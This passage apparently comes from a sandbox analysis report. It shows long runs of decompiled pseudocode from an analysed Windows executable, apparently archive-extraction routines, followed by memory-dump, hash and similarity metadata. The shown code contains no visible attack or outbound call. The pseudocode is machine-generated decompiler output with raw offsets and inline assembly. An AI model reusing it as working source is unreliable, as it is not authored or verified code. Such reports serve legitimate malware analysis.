                                          				signed int _t488;
                                          				signed char _t489;
                                          				intOrPtr* _t490;
                                          				signed int _t492;
                                          				intOrPtr _t498;
                                          				signed int _t501;
                                          				signed int _t502;
                                          				void* _t503;
                                          				signed char _t506;
                                          				signed int _t508;
                                          				intOrPtr _t509;
                                          				void* _t510;
                                          				void* _t512;
                                          
                                          				_t485 = __edx;
                                          				_t287 = E00413954(E0041A262, _t510);
                                          				_t407 = 0;
                                          				 *(_t510 - 4) = 0;
                                          				 *((char*)(_t510 - 0x4c)) = _t287 & 0xffffff00 |  *(_t510 + 0x14) != 0x00000000;
                                          				_t289 =  *(_t510 + 0x18);
                                          				 *((intOrPtr*)(_t510 - 0x10)) = _t512 - 0x124;
                                          				 *(_t510 + 0x18) = _t289;
                                          				if(_t289 != 0) {
                                          					 *((intOrPtr*)( *_t289 + 4))(_t289);
                                          				}
                                          				 *(_t510 - 4) = 1;
                                          				 *(_t510 - 0x1c) = _t407;
                                          				 *(_t510 - 0x18) = _t407;
                                          				 *((char*)(_t510 + 0x17)) =  *(_t510 + 0x10) == 0xffffffff;
                                          				if( *((char*)(_t510 + 0x17)) != 0) {
                                          					 *(_t510 + 0x10) =  *( *(_t510 + 8) + 0x7c);
                                          				}
                                          				if( *(_t510 + 0x10) != _t407) {
                                          					E00402155(_t510 - 0x30);
                                          					 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
                                          					_t291 = 0;
                                          					__eflags = 0;
                                          					 *(_t510 - 4) = 2;
                                          					 *(_t510 - 0x34) = 0;
                                          					while(1) {
                                          						__eflags = _t291 -  *(_t510 + 0x10);
                                          						if(_t291 >=  *(_t510 + 0x10)) {
                                          							break;
                                          						}
                                          						__eflags =  *((char*)(_t510 + 0x17));
                                          						if( *((char*)(_t510 + 0x17)) == 0) {
                                          							_t291 =  *( *(_t510 + 0xc) + _t291 * 4);
                                          						}
                                          						_t496 =  *(_t510 + 8);
                                          						 *(_t510 - 0x38) = _t291;
                                          						_t508 =  *( *((intOrPtr*)( *(_t510 + 8) + 0x1c8)) + _t291 * 4);
                                          						__eflags = _t508 - 0xffffffff;
                                          						if(_t508 != 0xffffffff) {
                                          							_t380 =  *(_t510 - 0x28);
                                          							__eflags = _t380 - _t407;
                                          							if(_t380 == _t407) {
                                          								L16:
                                          								 *(_t510 - 0x7c) =  *(_t510 - 0x7c) | 0xffffffff;
                                          								 *(_t510 - 0x78) = _t508;
                                          								E0040C3F8(_t510 - 0x74);
                                          								 *(_t510 - 0x5c) = _t407;
                                          								 *(_t510 - 0x58) = _t407;
                                          								_push(_t510 - 0x7c);
                                          								 *(_t510 - 4) = 5;
                                          								E0040C46D(_t510 - 0x30);
                                          								 *(_t510 - 4) = 2;
                                          								E004042AD(_t510 - 0x74);
                                          								_t475 = E0040C281( *((intOrPtr*)( *((intOrPtr*)(_t496 + 0x58)) + _t508 * 4)));
                                          								_t67 = _t510 - 0x1c;
                                          								 *_t67 =  *(_t510 - 0x1c) + _t475;
                                          								__eflags =  *_t67;
                                          								_t388 =  *((intOrPtr*)( *((intOrPtr*)(_t510 - 0x24)) +  *(_t510 - 0x28) * 4 - 4));
                                          								asm("adc [ebp-0x18], edx");
                                          								 *((intOrPtr*)(_t388 + 0x20)) = _t475;
                                          								 *(_t388 + 0x24) = _t485;
                                          								L17:
                                          								_t498 =  *((intOrPtr*)( *((intOrPtr*)(_t510 - 0x24)) +  *(_t510 - 0x28) * 4 - 4));
                                          								_t410 =  *((intOrPtr*)( *((intOrPtr*)( *(_t510 + 8) + 0x1b4)) + _t508 * 4));
                                          								_t509 =  *((intOrPtr*)(_t498 + 0x10));
                                          								while(1) {
                                          									_t393 =  *(_t510 - 0x38) - _t410;
                                          									__eflags = _t509 -  *(_t510 - 0x38) - _t410;
                                          									if(_t509 >  *(_t510 - 0x38) - _t410) {
                                          										goto L13;
                                          									}
                                          									_t87 = _t498 + 8; // 0xa
                                          									E0040C413(_t87, _t393 & 0xffffff00 | __eflags == 0x00000000);
                                          									_t509 = _t509 + 1;
                                          								}
                                          								goto L13;
                                          							}
                                          							_t397 =  *((intOrPtr*)( *((intOrPtr*)(_t510 - 0x24)) + _t380 * 4 - 4));
                                          							__eflags = _t508 -  *((intOrPtr*)(_t397 + 4));
                                          							if(_t508 ==  *((intOrPtr*)(_t397 + 4))) {
                                          								goto L17;
                                          							}
                                          							goto L16;
                                          						} else {
                                          							_push(_t508);
                                          							_push(_t291);
                                          							_push(E0040C30E(_t510 - 0x130));
                                          							 *(_t510 - 4) = 3;
                                          							E0040C46D(_t510 - 0x30);
                                          							 *(_t510 - 4) = 2;
                                          							E004042AD(_t510 - 0x128);
                                          							L13:
                                          							_t291 =  *(_t510 - 0x34) + 1;
                                          							_t407 = 0;
                                          							 *(_t510 - 0x34) = _t291;
                                          							continue;
                                          						}
                                          					}
                                          					_t292 =  *(_t510 + 0x18);
                                          					__eflags =  *((intOrPtr*)( *_t292 + 0xc))(_t292,  *(_t510 - 0x1c),  *(_t510 - 0x18)) - _t407;
                                          					if(__eflags == 0) {
                                          						E0040AC6A(_t510 - 0x108, __eflags, 1);
                                          						_push(0x38);
                                          						 *(_t510 - 4) = 7;
                                          						 *(_t510 - 0x40) = _t407;
                                          						 *(_t510 - 0x3c) = _t407;
                                          						 *(_t510 - 0x1c) = _t407;
                                          						 *(_t510 - 0x18) = _t407;
                                          						_t295 = E00403A76();
                                          						 *(_t510 + 0x10) = _t295;
                                          						__eflags = _t295 - _t407;
                                          						 *(_t510 - 4) = 8;
                                          						if(_t295 == _t407) {
                                          							_t501 = 0;
                                          							__eflags = 0;
                                          						} else {
                                          							_t501 = E004072A1(_t295);
                                          						}
                                          						_t488 = _t501;
                                          						__eflags = _t501 - _t407;
                                          						 *(_t510 - 4) = 7;
                                          						 *(_t510 - 0x38) = _t488;
                                          						 *(_t510 - 0x14) = _t501;
                                          						if(_t501 != _t407) {
                                          							 *((intOrPtr*)( *_t501 + 4))(_t501);
                                          						}
                                          						_push(_t407);
                                          						 *(_t510 - 4) = 9;
                                          						E00407334(_t501,  *(_t510 + 0x18));
                                          						_t502 = 0;
                                          						__eflags = 0;
                                          						 *(_t510 + 0x14) = 0;
                                          						while(1) {
                                          							 *(_t488 + 0x28) =  *(_t510 - 0x1c);
                                          							 *(_t488 + 0x2c) =  *(_t510 - 0x18);
                                          							 *(_t488 + 0x20) =  *(_t510 - 0x40);
                                          							 *(_t488 + 0x24) =  *(_t510 - 0x3c);
                                          							_t489 = E00407410(_t488);
                                          							__eflags = _t489 - _t407;
                                          							if(_t489 != _t407) {
                                          								break;
                                          							}
                                          							__eflags = _t502 -  *(_t510 - 0x28);
                                          							if(_t502 <  *(_t510 - 0x28)) {
                                          								_push(0x38);
                                          								 *(_t510 - 0x48) = _t407;
                                          								 *(_t510 - 0x44) = _t407;
                                          								_t490 =  *((intOrPtr*)( *((intOrPtr*)(_t510 - 0x24)) + _t502 * 4));
                                          								 *((intOrPtr*)(_t510 - 0x54)) =  *((intOrPtr*)(_t490 + 0x20));
                                          								 *((intOrPtr*)(_t510 - 0x50)) =  *((intOrPtr*)(_t490 + 0x24));
                                          								_t305 = E00403A76();
                                          								 *(_t510 + 0xc) = _t305;
                                          								__eflags = _t305 - _t407;
                                          								 *(_t510 - 4) = 0xb;
                                          								if(_t305 == _t407) {
                                          									_t408 = 0;
                                          									__eflags = 0;
                                          								} else {
                                          									_t408 = E0040C5E8(_t305);
                                          								}
                                          								__eflags = _t408;
                                          								 *(_t510 - 0x34) = _t408;
                                          								 *(_t510 - 4) = 9;
                                          								 *(_t510 + 0x10) = _t408;
                                          								if(_t408 != 0) {
                                          									 *((intOrPtr*)( *_t408 + 4))(_t408);
                                          								}
                                          								 *(_t510 - 4) = 0xc;
                                          								_t503 =  *(_t510 + 8) + 0x10;
                                          								_t307 =  *_t490;
                                          								__eflags = _t307 - 0xffffffff;
                                          								if(_t307 == 0xffffffff) {
                                          									_t307 =  *((intOrPtr*)( *((intOrPtr*)(_t503 + 0x1a4)) +  *(_t490 + 4) * 4));
                                          								}
                                          								__eflags =  *( *(_t510 + 8) + 0x1e0);
                                          								_t173 = _t490 + 8; // 0x8
                                          								_t308 = E0040C73A(_t408, _t503, 0, _t307, _t173,  *(_t510 + 0x18),  *((intOrPtr*)(_t510 - 0x4c)),  *(_t510 + 8) & 0xffffff00 |  *( *(_t510 + 8) + 0x1e0) != 0x00000000); // executed
                                          								__eflags = _t308;
                                          								 *(_t510 + 0xc) = _t308;
                                          								if(_t308 == 0) {
                                          									__eflags =  *_t490 - 0xffffffff;
                                          									if( *_t490 == 0xffffffff) {
                                          										_t492 =  *(_t490 + 4) << 2;
                                          										 *(_t510 + 0xc) =  *( *((intOrPtr*)(_t503 + 0x48)) + _t492);
                                          										 *(_t510 - 0x48) = E0040C2CD(_t503,  *(_t490 + 4));
                                          										 *(_t510 - 0x44) = _t485;
                                          										 *(_t510 - 4) = 0xe;
                                          										_t485 =  *( *((intOrPtr*)(_t503 + 0x17c)) + ( *( *((intOrPtr*)(_t503 + 0x190)) + _t492) << 3) + 4);
                                          										asm("adc edx, [esi+0x14c]");
                                          										_t314 = E0040AD19(_t510 - 0x108, __eflags,  *((intOrPtr*)( *(_t510 + 8) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t503 + 0x17c)) + ( *( *((intOrPtr*)(_t503 + 0x190)) + _t492) << 3))) +  *((intOrPtr*)(_t503 + 0x148)), _t485,  *((intOrPtr*)(_t503 + 0xc)) + ( *( *((intOrPtr*)(_t503 + 0x190)) + _t492) << 3),  *(_t510 + 0xc),  *(_t510 + 0x10),  *(_t510 - 0x14)); // executed
                                          										_t506 = _t314;
                                          										__eflags = _t506 - 1;
                                          										if(_t506 != 1) {
                                          											__eflags = _t506 - 0x80004001;
                                          											if(_t506 != 0x80004001) {
                                          												__eflags = _t506;
                                          												if(_t506 == 0) {
                                          													_t315 =  *((intOrPtr*)(_t408 + 0x18));
                                          													__eflags =  *((intOrPtr*)(_t408 + 0x28)) -  *((intOrPtr*)(_t315 + 8));
                                          													if( *((intOrPtr*)(_t408 + 0x28)) ==  *((intOrPtr*)(_t315 + 8))) {
                                          														 *(_t510 - 4) = 9;
                                          														E00403800(_t510 + 0x10);
                                          														L91:
                                          														 *(_t510 + 0x14) =  *(_t510 + 0x14) + 1;
                                          														 *(_t510 - 0x1c) =  *(_t510 - 0x1c) +  *((intOrPtr*)(_t510 - 0x54));
                                          														_t488 =  *(_t510 - 0x38);
                                          														_t502 =  *(_t510 + 0x14);
                                          														asm("adc [ebp-0x18], eax");
                                          														 *(_t510 - 0x40) =  *(_t510 - 0x40) +  *(_t510 - 0x48);
                                          														asm("adc [ebp-0x3c], eax");
                                          														_t407 = 0;
                                          														continue;
                                          													}
                                          													_t506 = E0040CA4C(_t408, _t510, 2);
                                          													_t323 =  *(_t510 + 0x10);
                                          													__eflags = _t506;
                                          													 *(_t510 - 4) = 9;
                                          													if(_t506 == 0) {
                                          														L86:
                                          														__eflags = _t323;
                                          														if(_t323 != 0) {
                                          															 *((intOrPtr*)( *_t323 + 8))(_t323);
                                          														}
                                          														 *(_t510 - 4) = 9;
                                          														goto L91;
                                          													}
                                          													__eflags = _t323;
                                          													if(_t323 != 0) {
                                          														 *((intOrPtr*)( *_t323 + 8))(_t323);
                                          													}
                                          													_t325 =  *(_t510 - 0x14);
                                          													 *(_t510 - 4) = 7;
                                          													__eflags = _t325;
                                          													if(__eflags != 0) {
                                          														 *((intOrPtr*)( *_t325 + 8))(_t325);
                                          													}
                                          													 *(_t510 - 4) = 2;
                                          													E0040C380(_t510 - 0x108, __eflags);
                                          													 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
                                          													 *(_t510 - 4) = 0x12;
                                          													L82:
                                          													E004042D6();
                                          													 *(_t510 - 4) = 1;
                                          													E004042AD(_t510 - 0x30);
                                          													_t329 =  *(_t510 + 0x18);
                                          													 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
                                          													__eflags = _t329;
                                          													L83:
                                          													if(__eflags != 0) {
                                          														 *((intOrPtr*)( *_t329 + 8))(_t329);
                                          													}
                                          													_t330 = _t506;
                                          													goto L92;
                                          												}
                                          												_t334 =  *(_t510 + 0x10);
                                          												 *(_t510 - 4) = 9;
                                          												__eflags = _t334;
                                          												if(_t334 != 0) {
                                          													 *((intOrPtr*)( *_t334 + 8))(_t334);
                                          												}
                                          												_t335 =  *(_t510 - 0x14);
                                          												 *(_t510 - 4) = 7;
                                          												__eflags = _t335;
                                          												if(__eflags != 0) {
                                          													 *((intOrPtr*)( *_t335 + 8))(_t335);
                                          												}
                                          												 *(_t510 - 4) = 2;
                                          												E0040C380(_t510 - 0x108, __eflags);
                                          												 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
                                          												 *(_t510 - 4) = 0x11;
                                          												goto L82;
                                          											}
                                          											_t506 = E0040CA4C(_t408, _t510, 1);
                                          											_t323 =  *(_t510 + 0x10);
                                          											__eflags = _t506;
                                          											 *(_t510 - 4) = 9;
                                          											if(_t506 == 0) {
                                          												goto L86;
                                          											}
                                          											__eflags = _t323;
                                          											if(_t323 != 0) {
                                          												 *((intOrPtr*)( *_t323 + 8))(_t323);
                                          											}
                                          											_t340 =  *(_t510 - 0x14);
                                          											 *(_t510 - 4) = 7;
                                          											__eflags = _t340;
                                          											if(__eflags != 0) {
                                          												 *((intOrPtr*)( *_t340 + 8))(_t340);
                                          											}
                                          											 *(_t510 - 4) = 2;
                                          											E0040C380(_t510 - 0x108, __eflags);
                                          											 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
                                          											 *(_t510 - 4) = 0x10;
                                          											goto L82;
                                          										}
                                          										_t506 = E0040CA4C(_t408, _t510, 2);
                                          										_t323 =  *(_t510 + 0x10);
                                          										__eflags = _t506;
                                          										 *(_t510 - 4) = 9;
                                          										if(_t506 == 0) {
                                          											goto L86;
                                          										}
                                          										__eflags = _t323;
                                          										if(_t323 != 0) {
                                          											 *((intOrPtr*)( *_t323 + 8))(_t323);
                                          										}
                                          										_t345 =  *(_t510 - 0x14);
                                          										 *(_t510 - 4) = 7;
                                          										__eflags = _t345;
                                          										if(__eflags != 0) {
                                          											 *((intOrPtr*)( *_t345 + 8))(_t345);
                                          										}
                                          										 *(_t510 - 4) = 2;
                                          										E0040C380(_t510 - 0x108, __eflags);
                                          										 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
                                          										 *(_t510 - 4) = 0xf;
                                          										goto L82;
                                          									}
                                          									_t349 =  *(_t510 + 0x10);
                                          									 *(_t510 - 4) = 9;
                                          									__eflags = _t349;
                                          									if(_t349 != 0) {
                                          										 *((intOrPtr*)( *_t349 + 8))(_t349);
                                          									}
                                          									goto L91;
                                          								} else {
                                          									_t351 =  *(_t510 + 0x10);
                                          									 *(_t510 - 4) = 9;
                                          									__eflags = _t351;
                                          									if(_t351 != 0) {
                                          										 *((intOrPtr*)( *_t351 + 8))(_t351);
                                          									}
                                          									_t352 =  *(_t510 - 0x14);
                                          									 *(_t510 - 4) = 7;
                                          									__eflags = _t352;
                                          									if(__eflags != 0) {
                                          										 *((intOrPtr*)( *_t352 + 8))(_t352);
                                          									}
                                          									 *(_t510 - 4) = 2;
                                          									E0040C380(_t510 - 0x108, __eflags);
                                          									 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
                                          									 *(_t510 - 4) = 0xd;
                                          									E004042D6();
                                          									 *(_t510 - 4) = 1;
                                          									E004042AD(_t510 - 0x30);
                                          									_t356 =  *(_t510 + 0x18);
                                          									 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
                                          									__eflags = _t356;
                                          									if(_t356 != 0) {
                                          										 *((intOrPtr*)( *_t356 + 8))(_t356);
                                          									}
                                          									_t330 =  *(_t510 + 0xc);
                                          									goto L92;
                                          								}
                                          							}
                                          							 *(_t510 - 4) = 7;
                                          							E00403800(_t510 - 0x14);
                                          							 *(_t510 - 4) = 2;
                                          							E0040C380(_t510 - 0x108, __eflags); // executed
                                          							 *(_t510 - 4) = 1;
                                          							E0040C435(_t510 - 0x30);
                                          							_t144 = _t510 - 4;
                                          							 *_t144 =  *(_t510 - 4) & 0x00000000;
                                          							__eflags =  *_t144;
                                          							E00403800(_t510 + 0x18);
                                          							goto L36;
                                          						}
                                          						_t368 =  *(_t510 - 0x14);
                                          						 *(_t510 - 4) = 7;
                                          						__eflags = _t368 - _t407;
                                          						if(__eflags != 0) {
                                          							 *((intOrPtr*)( *_t368 + 8))(_t368);
                                          						}
                                          						 *(_t510 - 4) = 2;
                                          						E0040C380(_t510 - 0x108, __eflags);
                                          						 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
                                          						 *(_t510 - 4) = 0xa;
                                          						E004042D6();
                                          						 *(_t510 - 4) = 1;
                                          						E004042AD(_t510 - 0x30);
                                          						_t372 =  *(_t510 + 0x18);
                                          						 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
                                          						__eflags = _t372 - _t407;
                                          						if(_t372 != _t407) {
                                          							 *((intOrPtr*)( *_t372 + 8))(_t372);
                                          						}
                                          						_t330 = _t489;
                                          						goto L92;
                                          					}
                                          					 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
                                          					 *(_t510 - 4) = 6;
                                          					E004042D6();
                                          					 *(_t510 - 4) = 1;
                                          					E004042AD(_t510 - 0x30);
                                          					_t329 =  *(_t510 + 0x18);
                                          					 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
                                          					__eflags = _t329 - _t407;
                                          					goto L83;
                                          				} else {
                                          					_t401 =  *(_t510 + 0x18);
                                          					 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
                                          					if(_t401 != _t407) {
                                          						 *((intOrPtr*)( *_t401 + 8))(_t401);
                                          					}
                                          					L36:
                                          					_t330 = 0;
                                          					L92:
                                          					 *[fs:0x0] =  *((intOrPtr*)(_t510 - 0xc));
                                          					return _t330;
                                          				}
                                          			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: e20e68f67df63d5f9e9ba5d17b85cf5a5e4b904928eba79c37a56f5e811e61d3
                                          • Instruction ID: 754c2283aee26f26976a66738bb4ef570e525f81dc1fbbef9a6f78583ad2e2a8
                                          • Opcode Fuzzy Hash: e20e68f67df63d5f9e9ba5d17b85cf5a5e4b904928eba79c37a56f5e811e61d3
                                          • Instruction Fuzzy Hash: 5B325D70904249DFDB10DFA8C584ADEBBB4AF58304F1441AEE855BB3C2CB78AE45CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 94%
                                          			E0040280D() {
                                          				void* __ebx;
                                          				intOrPtr* _t185;
                                          				intOrPtr* _t186;
                                          				signed int _t187;
                                          				signed int _t195;
                                          				intOrPtr* _t196;
                                          				signed int _t197;
                                          				intOrPtr _t198;
                                          				intOrPtr* _t199;
                                          				intOrPtr* _t204;
                                          				intOrPtr* _t207;
                                          				signed int _t208;
                                          				signed int _t209;
                                          				FILETIME* _t217;
                                          				signed int _t226;
                                          				signed int _t227;
                                          				FILETIME* _t228;
                                          				FILETIME* _t244;
                                          				signed int _t270;
                                          				intOrPtr _t289;
                                          				WCHAR* _t315;
                                          				signed int _t338;
                                          				signed int _t340;
                                          				signed int _t342;
                                          				intOrPtr _t344;
                                          				intOrPtr* _t346;
                                          				signed int _t347;
                                          				void* _t348;
                                          
                                          				E00413954(E0041921B, _t348);
                                          				_t344 =  *((intOrPtr*)(_t348 + 8));
                                          				if(E00402D80(_t344 + 0xa8) == 0) {
                                          					_t185 =  *((intOrPtr*)(_t344 + 0x4c));
                                          					_t270 = 0;
                                          					__eflags = _t185;
                                          					if(_t185 != 0) {
                                          						 *((intOrPtr*)( *_t185 + 8))(_t185);
                                          						 *((intOrPtr*)(_t344 + 0x4c)) = 0;
                                          					}
                                          					 *(_t348 - 0x58) = _t270;
                                          					 *(_t348 - 0x56) = _t270;
                                          					_t186 =  *((intOrPtr*)(_t344 + 0xc));
                                          					_t338 =  *(_t348 + 0xc);
                                          					 *(_t348 - 4) = _t270;
                                          					_t187 =  *((intOrPtr*)( *_t186 + 0x18))(_t186, _t338, 3, _t348 - 0x58);
                                          					__eflags = _t187 - _t270;
                                          					if(_t187 == _t270) {
                                          						 *(_t348 - 0x18) = _t270;
                                          						 *(_t348 - 0x14) = _t270;
                                          						 *(_t348 - 0x10) = _t270;
                                          						E00402170(_t348 - 0x18, 3);
                                          						__eflags =  *(_t348 - 0x58) - _t270;
                                          						 *(_t348 - 4) = 1;
                                          						if( *(_t348 - 0x58) != _t270) {
                                          							__eflags =  *(_t348 - 0x58) - 8;
                                          							if( *(_t348 - 0x58) == 8) {
                                          								E00401D1B(_t348 - 0x18,  *((intOrPtr*)(_t348 - 0x50)));
                                          								L12:
                                          								E00401D7A(_t344 + 0x1c, _t348 - 0x18);
                                          								__eflags =  *((intOrPtr*)(_t348 + 0x14)) - _t270;
                                          								if( *((intOrPtr*)(_t348 + 0x14)) != _t270) {
                                          									 *( *(_t348 + 0x10)) = _t270;
                                          									L61:
                                          									E00403A9C( *(_t348 - 0x18));
                                          									 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
                                          									E00405E34(_t348 - 0x58);
                                          									_t195 = 0;
                                          									__eflags = 0;
                                          									goto L62;
                                          								}
                                          								 *(_t348 - 0x28) = _t270;
                                          								 *(_t348 - 0x26) = _t270;
                                          								_t196 =  *((intOrPtr*)(_t344 + 0xc));
                                          								 *(_t348 - 4) = 2;
                                          								_t197 =  *((intOrPtr*)( *_t196 + 0x18))(_t196, _t338, 9, _t348 - 0x28);
                                          								__eflags = _t197 - _t270;
                                          								if(_t197 == _t270) {
                                          									__eflags =  *(_t348 - 0x28) - _t270;
                                          									if( *(_t348 - 0x28) != _t270) {
                                          										__eflags =  *(_t348 - 0x28) - 0x13;
                                          										if( *(_t348 - 0x28) == 0x13) {
                                          											_t198 =  *((intOrPtr*)(_t348 - 0x20));
                                          											L20:
                                          											 *((intOrPtr*)(_t344 + 0x44)) = _t198;
                                          											_t199 =  *((intOrPtr*)(_t344 + 0xc));
                                          											_t197 =  *((intOrPtr*)( *_t199 + 0x18))(_t199, _t338, 6, _t348 - 0x28);
                                          											__eflags = _t197 - _t270;
                                          											if(_t197 != _t270) {
                                          												goto L14;
                                          											}
                                          											__eflags =  *((intOrPtr*)(_t348 - 0x20)) - _t270;
                                          											 *(_t348 + 0xb) = _t270;
                                          											 *(_t348 - 0x74) = _t270;
                                          											 *(_t348 - 0x72) = _t270;
                                          											 *((char*)(_t344 + 0x40)) = _t197 & 0xffffff00 |  *((intOrPtr*)(_t348 - 0x20)) != _t270;
                                          											_t204 =  *((intOrPtr*)(_t344 + 0xc));
                                          											 *(_t348 - 4) = 3;
                                          											_t340 =  *((intOrPtr*)( *_t204 + 0x18))(_t204, _t338, 0x15, _t348 - 0x74);
                                          											__eflags = _t340 - _t270;
                                          											if(_t340 == _t270) {
                                          												__eflags =  *(_t348 - 0x74) - 0xb;
                                          												if( *(_t348 - 0x74) == 0xb) {
                                          													__eflags =  *((intOrPtr*)(_t348 - 0x6c)) - _t270;
                                          													_t66 = _t348 + 0xb;
                                          													 *_t66 =  *((intOrPtr*)(_t348 - 0x6c)) != _t270;
                                          													__eflags =  *_t66;
                                          												}
                                          												 *(_t348 - 4) = 2;
                                          												E00405E34(_t348 - 0x74);
                                          												_t207 =  *((intOrPtr*)(_t344 + 0xc));
                                          												_t197 =  *((intOrPtr*)( *_t207 + 0x18))(_t207,  *(_t348 + 0xc), 0xc, _t348 - 0x28);
                                          												__eflags = _t197 - _t270;
                                          												if(_t197 != _t270) {
                                          													goto L14;
                                          												} else {
                                          													_t208 =  *(_t348 - 0x28) & 0x0000ffff;
                                          													__eflags = _t208 - _t270;
                                          													if(_t208 == _t270) {
                                          														_t209 = _t344 + 0x38;
                                          														 *(_t348 + 0xc) = _t209;
                                          														 *_t209 =  *((intOrPtr*)(_t344 + 0x5c));
                                          														_t289 =  *((intOrPtr*)(_t344 + 0x60));
                                          														L30:
                                          														 *((intOrPtr*)(_t209 + 4)) = _t289;
                                          														E00402155(_t348 - 0x3c);
                                          														_t341 = 0x41b370;
                                          														 *((intOrPtr*)(_t348 - 0x3c)) = 0x41b370;
                                          														 *(_t348 - 4) = 4;
                                          														E004044BC(_t348 - 0x18, _t348 - 0x3c, __eflags);
                                          														__eflags =  *((intOrPtr*)(_t348 - 0x34)) - _t270;
                                          														if( *((intOrPtr*)(_t348 - 0x34)) != _t270) {
                                          															E00401CE1(_t348 - 0x64, _t348 - 0x18);
                                          															__eflags =  *((intOrPtr*)(_t344 + 0x40)) - _t270;
                                          															 *(_t348 - 4) = 6;
                                          															if( *((intOrPtr*)(_t344 + 0x40)) == _t270) {
                                          																E004042DE(_t348 - 0x3c);
                                          															}
                                          															__eflags =  *((intOrPtr*)(_t348 - 0x34)) - _t270;
                                          															if( *((intOrPtr*)(_t348 - 0x34)) != _t270) {
                                          																__eflags =  *(_t348 + 0xb) - _t270;
                                          																if( *(_t348 + 0xb) == _t270) {
                                          																	_push(_t348 - 0x3c); // executed
                                          																	E004027A6(_t344); // executed
                                          																}
                                          															}
                                          															_t335 = _t344 + 0x10;
                                          															_push(_t348 - 0x64);
                                          															E00402634(_t348 - 0x48, _t344 + 0x10);
                                          															__eflags =  *((intOrPtr*)(_t344 + 0x40)) - _t270;
                                          															 *(_t348 - 4) = 7;
                                          															if( *((intOrPtr*)(_t344 + 0x40)) == _t270) {
                                          																E00402EE1(_t348 - 0x84);
                                          																_push( *((intOrPtr*)(_t348 - 0x48)));
                                          																 *(_t348 - 4) = 9;
                                          																_t217 = E00405841(_t348 - 0xac, _t335); // executed
                                          																__eflags = _t217;
                                          																if(_t217 == 0) {
                                          																	L48:
                                          																	__eflags =  *(_t348 + 0xb) - _t270;
                                          																	if( *(_t348 + 0xb) != _t270) {
                                          																		L59:
                                          																		E00401D7A(_t344 + 0x28, _t348 - 0x48);
                                          																		E00403A9C( *((intOrPtr*)(_t348 - 0x84)));
                                          																		E00403A9C( *((intOrPtr*)(_t348 - 0x48)));
                                          																		E00403A9C( *((intOrPtr*)(_t348 - 0x64)));
                                          																		 *((intOrPtr*)(_t348 - 0x3c)) = _t341;
                                          																		 *(_t348 - 4) = 0xd;
                                          																		E004042D6();
                                          																		 *(_t348 - 4) = 2;
                                          																		E004042AD(_t348 - 0x3c);
                                          																		 *(_t348 - 4) = 1;
                                          																		E00405E34(_t348 - 0x28);
                                          																		goto L61;
                                          																	}
                                          																	_push(0x18);
                                          																	_t226 = E00403A76();
                                          																	__eflags = _t226 - _t270;
                                          																	if(_t226 == _t270) {
                                          																		_t342 = 0;
                                          																		__eflags = 0;
                                          																	} else {
                                          																		 *(_t226 + 4) = _t270;
                                          																		 *(_t226 + 8) =  *(_t226 + 8) | 0xffffffff;
                                          																		 *_t226 = 0x41b354;
                                          																		_t342 = _t226;
                                          																	}
                                          																	__eflags = _t342 - _t270;
                                          																	 *(_t344 + 0x48) = _t342;
                                          																	 *(_t348 + 0xc) = _t342;
                                          																	if(_t342 != _t270) {
                                          																		 *((intOrPtr*)( *_t342 + 4))(_t342);
                                          																	}
                                          																	_t227 =  *(_t344 + 0x48);
                                          																	 *(_t227 + 0x10) = _t270;
                                          																	 *(_t348 - 4) = 0xb;
                                          																	 *(_t227 + 0x14) = _t270;
                                          																	_t228 = E00405C43( *((intOrPtr*)(_t348 - 0x48)), 1);
                                          																	__eflags = _t228;
                                          																	if(_t228 != 0) {
                                          																		E0040640D(_t344 + 0x4c, _t342);
                                          																		 *(_t348 - 4) = 9;
                                          																		 *( *(_t348 + 0x10)) = _t342;
                                          																		_t341 = 0x41b370;
                                          																		goto L59;
                                          																	} else {
                                          																		E00401D1B(_t344 + 0xe4,  *0x420280);
                                          																		__eflags = _t342 - _t270;
                                          																		 *(_t348 - 4) = 9;
                                          																		if(_t342 != _t270) {
                                          																			 *((intOrPtr*)( *_t342 + 8))(_t342);
                                          																		}
                                          																		E00403A9C( *((intOrPtr*)(_t348 - 0x84)));
                                          																		E00403A9C( *((intOrPtr*)(_t348 - 0x48)));
                                          																		E00403A9C( *((intOrPtr*)(_t348 - 0x64)));
                                          																		 *((intOrPtr*)(_t348 - 0x3c)) = 0x41b370;
                                          																		 *(_t348 - 4) = 0xc;
                                          																		E004042D6();
                                          																		 *(_t348 - 4) = 2;
                                          																		E004042AD(_t348 - 0x3c);
                                          																		 *(_t348 - 4) = 1;
                                          																		E00405E34(_t348 - 0x28);
                                          																		E00403A9C( *(_t348 - 0x18));
                                          																		 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
                                          																		E00405E34(_t348 - 0x58);
                                          																		_t195 = 0x80004005;
                                          																		goto L62;
                                          																	}
                                          																}
